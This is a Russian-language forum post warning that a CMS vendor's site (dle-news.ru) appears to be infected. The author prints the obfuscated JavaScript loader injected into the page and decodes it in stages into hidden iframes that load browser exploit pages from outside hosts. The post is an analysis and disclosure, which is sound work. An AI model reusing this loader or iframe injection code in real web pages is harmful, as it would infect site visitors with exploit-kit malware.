- Автор темы
- #1
Сорри за такую кричащую тему, да еще в такой поздний час (02.40 местного)? но если это не подмена содержимого, не правка DNS в серваке.... то... )))
Случайно решил зайти на офф.сайт и при загрузки сработал антизверь. Антизверь параноик, и увидив знакомое сочетание в домене google, я разрешил ему выполнить скрипт.
Совственно сижу под оперой и ничего страшного не произошло.
[update] пока писал, решил еще раз глянуть, скрипт отработал по новой (куки потер, ИП сменил для верности) и выкинул новый фрейм, скриншот с воплями авиры смотреть здесь Для просмотра ссылки Войдиили Зарегистрируйся [/update]
Озадачало только появление рекламы с гугля на сайте целсофта, который поидее еще до 6 в отпуске.
Открываю исходник главной страницы? гуглом и не пахнет, а вижу ЛЕВЫЙ код, сначало не поверил.
после расшифровки получаем
т.е. открывается фрейм по адресу Для просмотра ссылки Войди или Зарегистрируйся
причем открывается один раз - фильт по кукам + ip, если один раз у вас страница подгружалась - то выдается 404.
смотрим
грузим, смотрим
дешифруем
короче мне надоело, это явно одна из последних сязок сплоитов под распространенные браузеры.
как я понял выдают страницы RND со сплоитами, и если вы опять на них были - идет переадресация, в моем случае при первых попытках "пройтись до конца" была на msn.com
под оперой 9.52 ничего не пристает. у кого ишак - даже не думайте, FF... хз.
ИТОГО.
КАК и через что внесли коррективы в сайт целсофта я НЕ знаю.
либо хостер, либо шаблон через админку, либо пароль через троян на фтп... всяко может быть.
зыы. проверил через разные php анамайзеры, код висит, значит точно не dns
==============
//ТАК ЖЕ ЗАРАЖЕННЫМ оказался Украинский сайт DLE
насчет украинского сайта поторопился. вот тут это было ложным срабатыванием, сейчас дешифровал, оказывается они так подгрузку css прячут.
а вот dle-news.ru все еще светиться.
значит имхо дело в хосте
Случайно решил зайти на офф.сайт и при загрузки сработал антизверь. Антизверь параноик, и увидив знакомое сочетание в домене google, я разрешил ему выполнить скрипт.
Совственно сижу под оперой и ничего страшного не произошло.
[update] пока писал, решил еще раз глянуть, скрипт отработал по новой (куки потер, ИП сменил для верности) и выкинул новый фрейм, скриншот с воплями авиры смотреть здесь Для просмотра ссылки Войди
Озадачало только появление рекламы с гугля на сайте целсофта, который поидее еще до 6 в отпуске.
Открываю исходник главной страницы? гуглом и не пахнет, а вижу ЛЕВЫЙ код, сначало не поверил.
Код:
<body><script language=JavaScript> function mdnbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0,0,0,24,11,60,12,44,43,5,3,15,59,36,30,55,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0,0,0,0,41,0,48,16,20,21,28,22,2,42,54,18,23,17,25,62,9,37,34,61,56,47,40,35,57,39,32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KIzAXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7MusWnI') </script><!-- dle-news.ru -->
<script language="javascript" type="text/javascript">
<!--
var dle_root = '/';после расшифровки получаем
Код:
window.status='Done';document.write('<iframe name=47210 src="http://gate6k.info/t/?'+Math.round(Math.random()*16909)+'47210'+'" width=457 height=37 style="display:none"></iframe>')причем открывается один раз - фильт по кукам + ip, если один раз у вас страница подгружалась - то выдается 404.
смотрим
Код:
<iframe name=1c53b80a90 src='http://sum4count.net/strong/188/?cd6f51' width=399 height=60 style='display:none;'></iframe>грузим, смотрим
Код:
<html>
<body>
<script>
document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%65%32%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%6D%70%39%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E"));
</script>
</body>
</html>дешифруем
Код:
<iframe src="e2.html" width="1" height="1"></iframe>
<iframe src="mp9.html" width="1" height="1"></iframe>короче мне надоело, это явно одна из последних сязок сплоитов под распространенные браузеры.
как я понял выдают страницы RND со сплоитами, и если вы опять на них были - идет переадресация, в моем случае при первых попытках "пройтись до конца" была на msn.com
под оперой 9.52 ничего не пристает. у кого ишак - даже не думайте, FF... хз.
ИТОГО.
КАК и через что внесли коррективы в сайт целсофта я НЕ знаю.
либо хостер, либо шаблон через админку, либо пароль через троян на фтп... всяко может быть.
зыы. проверил через разные php анамайзеры, код висит, значит точно не dns
==============
//ТАК ЖЕ ЗАРАЖЕННЫМ оказался Украинский сайт DLE
насчет украинского сайта поторопился. вот тут это было ложным срабатыванием, сейчас дешифровал, оказывается они так подгрузку css прячут.
а вот dle-news.ru все еще светиться.
значит имхо дело в хосте
